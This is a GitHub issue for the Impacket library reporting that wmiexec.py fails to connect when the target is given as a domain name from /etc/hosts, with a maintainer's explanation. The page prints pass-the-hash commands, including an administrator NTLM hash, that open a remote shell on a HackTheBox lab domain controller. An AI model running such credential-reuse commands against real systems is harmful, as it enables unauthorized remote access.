search

fortra / impacket

Impacket is a collection of Python classes for working with network protocols.
https://www.coresecurity.com
Other
13.37k stars 3.56k forks source link

wmiexec.py: "Can't find a valid stringBinding to connect" when using a domain defined in `/etc/hosts` #1746

Open 0xfalafel opened 4 months ago

0xfalafel commented 4 months ago

Configuration

impacket version: v0.12.0.dev1+20231015.203043.419e6f24 Python version: 3.11 Target OS: Microsoft Windows Server 2019 Standard - 10.0.17763 N/A Build 17763

Context

I was doing the Blackfield machine from hackthebox. And I was surprised to see that wmiexec.py failed to connect to blackfield.local when using the administrator's hash.

My /etc/hosts configuration has a line for blackfield.local:

$ grep blackfield /etc/hosts
10.10.10.192    blackfield blackfield.local dc01.blackfield.local

Failing command

$ wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee administrator@blackfield.local -debug
Impacket v0.12.0.dev1+20231015.203043.419e6f24 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /home/kali/.local/pipx/venvs/impacket/lib/python3.11/site-packages/impacket
[*] SMBv3.0 dialect used
[+] Target system is blackfield.local and isFQDN is True
[+] StringBinding: DC01[49907]
[+] StringBinding: 10.10.10.192[49907]
[+] StringBinding chosen: None
Traceback (most recent call last):
  File "/home/kali/.local/bin/wmiexec.py", line 95, in run
    iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL)
                    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/.local/pipx/venvs/impacket/lib/python3.11/site-packages/impacket/dcerpc/v5/dcom/wmi.py", line 3259, in NTLMLogin
    resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/.local/pipx/venvs/impacket/lib/python3.11/site-packages/impacket/dcerpc/v5/dcomrt.py", line 1326, in request
    self.connect(iid)
  File "/home/kali/.local/pipx/venvs/impacket/lib/python3.11/site-packages/impacket/dcerpc/v5/dcomrt.py", line 1286, in connect
    raise Exception('Can\'t find a valid stringBinding to connect')
Exception: Can't find a valid stringBinding to connect
[-] Can't find a valid stringBinding to connect

Alternative working commands

The command fail when using blackfield.local, but works correctly when using dc01.blackfield.local, or directly the IP address 10.10.10.192.

dc01.blackfield.local

$ wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee administrator@dc01.blackfield.local -debug
Impacket v0.12.0.dev1+20231015.203043.419e6f24 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /home/kali/.local/pipx/venvs/impacket/lib/python3.11/site-packages/impacket
[*] SMBv3.0 dialect used
[+] Target system is dc01.blackfield.local and isFQDN is True
[+] StringBinding: DC01[49907]
[+] StringBinding chosen: ncacn_ip_tcp:dc01.blackfield.local[49907]
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
blackfield\administrator

C:\>

10.10.10.192

$ wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee administrator@10.10.10.192 -debug
Impacket v0.12.0.dev1+20231015.203043.419e6f24 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /home/kali/.local/pipx/venvs/impacket/lib/python3.11/site-packages/impacket
[*] SMBv3.0 dialect used
[+] Target system is 10.10.10.192 and isFQDN is False
[+] StringBinding: DC01[49907]
[+] StringBinding: 10.10.10.192[49907]
[+] StringBinding chosen: ncacn_ip_tcp:10.10.10.192[49907]
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
blackfield\administrator

C:\>exit

Additional context

Looking at the logs, we see that no StringBinding is chosen when using the domain from /etc/hosts.

blackfield.local

[+] Target system is blackfield.local and isFQDN is True
[+] StringBinding: DC01[49907]
[+] StringBinding: 10.10.10.192[49907]
[+] StringBinding chosen: None

While a StringBinding is chosen in the other 2 cases.

dc01.blackfield.local

[+] Target system is dc01.blackfield.local and isFQDN is True
[+] StringBinding: DC01[49907]
[+] StringBinding chosen: ncacn_ip_tcp:dc01.blackfield.local[49907]

10.10.10.192

[+] Target system is 10.10.10.192 and isFQDN is False
[+] StringBinding: DC01[49907]
[+] StringBinding: 10.10.10.192[49907]
[+] StringBinding chosen: ncacn_ip_tcp:10.10.10.192[49907]
anadrianmanrique commented 4 months ago

Hello @Faelian, this seems to be the expected behavior as current code it's expecting to match the target parameter with the response from the remote oxid resolver (https://github.com/fortra/impacket/blob/master/impacket/dcerpc/v5/dcomrt.py#L1254). In your case dc01.blackfield.local and 10.10.10.192 were answered as valid remote addresses to connect to, despite being able to resolve the remote IP by touching /etc/hosts